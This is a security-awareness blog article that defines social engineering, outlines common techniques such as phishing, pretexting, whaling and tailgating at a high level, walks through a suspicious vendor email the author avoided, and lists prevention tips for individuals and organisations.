What Is Social Engineering?

What Is A Social Engineering Attack And How To Prevent Them

Written by:

Social engineering is recognized as one of the greatest security threats facing organizations. It is extremely effective because the attacks are persuasive and very deceptive.


According to a recent cyber security report, 98% of cyber-attacks rely on some form of social engineering. The report also mentions that 21% of current or former employees use Social engineering to gain financial advantage or revenge.


One of the most alarming threats reported from the article is that Social engineering attempts spiked more than 500% from the first to second quarter of 2018.


What Is A Social Engineering Attack And How Does It Work?


Social engineering attacks can come in many forms, but let’s first understand the term in more detail. Social engineering is defined as the psychological manipulation of people into performing actions or divulging confidential information.


It sounds like a Jedi mind trick, but in reality, it is a trick based on human perception. Social engineering is the number one threat because it plays on our behavior and tendencies to trust.


Who Is Most At Risk Of Social Engineering Attacks?


Candidates for a social engineering attack can range from a corporate executive to an elementary school student. Even the most seasoned IT professional can be victimized by this type of attack.


Interestingly, social engineering is also reported to rely on principles of influence. If this is the case, anyone exposed to the news media, advertising, a computer or smartphone connected to the Internet is susceptible to this attack.


Note an excerpt from a report describing the principles of influence, which addresses why social engineering works so well today.


  • Reciprocity – People tend to return a favor, hence the pervasiveness of free samples in marketing.
  • Commitment and consistency – If people commit to an idea or goal (orally or in writing), they are more likely to honor that commitment because it’s now congruent with their self-image. Even if the original incentive or motivation is removed after they have already committed, people will continue to honor the agreement.
  • Social proof – People will do things that they see others doing.
  • Authority – People will tend to obey authority figures, even if they’re asked by those figures to perform objectionable acts.
  • Liking – People are easily persuaded by others that they like.
  • Scarcity – Perceived scarcity will generate demand. For example, by saying offers are available for a “limited time only,” retailers encourage sales.


The good news is that we have an understanding of the problem, but at the same malicious actors have already created systems in place to exploit the above principles of human behavior.


What Are Common Types of Social Engineering Techniques?


The most common types of social engineering techniques include phishing, water hole attacks, pretexting, whaling and tailgating.


1. Phishing Attacks


No, this isn’t a typo. Phishing refers to an attack that is usually sent in the form of a link embedded within an email. The email is disguised and looks like an email from a reliable source, but in reality, it’s a link to a malicious site.


2. Watering Hole


A watering hole attack consists of injecting malicious code into the public Web pages of a site that the targets used to visit. The method of injection is not new, and it is commonly used by cyber criminals and hackers. The attackers compromise websites within a specific sector that are ordinary visited by specific individuals of interest for the attacks.


3. Pretexting


An attacker can impersonate an external IT services operator to ask internal staff for information that could allow accessing system within the organization.


4. Whaling Attacks


Whaling adopts the same methods of spear phishing attacks, but the scam email is designed to masquerade as a critical business email sent from a legitimate authority, typically from relevant executives of important organizations. The word whaling is used, indicating that the target is a big fish to capture.


5. Tailgating


The tailgating attack, also known as “piggybacking,” involves an attacker seeking entry to a restricted area that lacks the proper authentication.


The attacker can simply walk in behind a person who is authorized to access the area. In a typical attack scenario, a person impersonates a delivery driver or a caretaker who is packed with parcels and waits when an employee opens their door.


Example Of A Social Engineering Attack


I didn’t have to look far to find an example. I’ll share an incident involving a recent email that appeared our mailbox.


Appears the attacker had everything right. The logo looks legitimate and I do have an account with this vendor, but something looked amiss. Now mind you, I first saw this on my mobile device and I didn’t open any links. So I decided I needed to take a closer look at this on my desktop computer.


First rule of thumb when you believe an email is suspicious or have that why I received this email feeling, DO NOT CLICK any URL’s or links in the email. I’ll explain later, but first take a close look at the sender email address (Note the explanation in the text box below).


Example Of A Social Engineering Attack - PurpleSec


So what did I avoid by not clicking this suspicious email? I avoided exposing my user name and password to what appears to be a phony web site. They possibly could have asked for a credit card or my personal bank information. Once they have my account info, game over.


To put this in perspective, imagine this attack being replicated 1,000 times daily for a year to a million people.


It’s astounding to calculate, but that’s the reality of why social engineering ranks high as a cyber security attack.


How Do You Prevent Social Engineering Attacks?


There are a variety of ways to prevent social engineering attacks. Many corporate environments conduct security awareness exercises throughout the year to inform their employees of security best practices in the workplace.


It’s commonplace also to see companies simulate phishing attacks by sending fake emails to their employees to test their behavior.


You can prevent social engineering attacks, whether in the office or on a personal device by following these recommendations.


Be Suspicious


Be suspicious of unsolicited phone calls, visits, or email messages from individuals asking about employees or other internal information. If an unknown individual claims to be from a legitimate organization, try to verify his or her identity directly with the company.


Do Not Provide Personal Information


Do not provide personal information or information about your organization, including its structure or networks, unless you are certain of a person’s authority to have the information.


Do Not Provide Financial Information


Do not reveal personal or financial information in email, and do not respond to email solicitations for this information. This includes following links sent in email.


Don’t Send Sensitive Information


Don’t send sensitive information over the internet before checking a website’s security. (See Protecting Your Privacy for more information.)


Pay Attention To URLs


Pay attention to the Uniform Resource Locator (URL) of a website. Malicious websites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain (e.g., .com vs. .net).


Verify The Company Contacting You


If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Do not use contact information provided on a website connected to the request; instead, check previous statements for contact information. Information about known phishing attacks is also available online from groups such as the Anti-Phishing Working Group. (See the APWG eCrime Research Papers).


Install Attack Mitigations


Install and maintain anti-virus software, firewalls, and email filters to reduce some of this traffic. (See Understanding FirewallsUnderstanding Anti-Virus Software, and Reducing Spam for more information.) Finally,  take advantage of any anti-phishing features offered by your email client and web browser.


Related Resources


Web Application Penetration Testing - PurpleSec

Social Engineering Penetration Testing: Attacks, Methods, And Steps

There are many different methods for performing a penetration test, which evaluates the security posture of a company, but in this article, we are going to focus on one: social engineering.   Social engineering penetration testing focuses on people and processes and the vulnerabilities associated with them. These pen tests typically consist of an ethical hacker conducting different social engineering attacks such...

Read More
Differences between phishing spear phishing and whaling attacks

What’s The Difference Between Phishing, Spear Phishing & Whaling?

It is commonly known throughout the security community that users are the “weakest link in the chain” when it comes to a company’s network. This reason is why so many attackers first gain a foothold in a network through phishing attacks.   There are different types of phishing that threaten a company’s network: phishing, spear-phishing, and whaling. Phishing emails are broadly sent...

Read More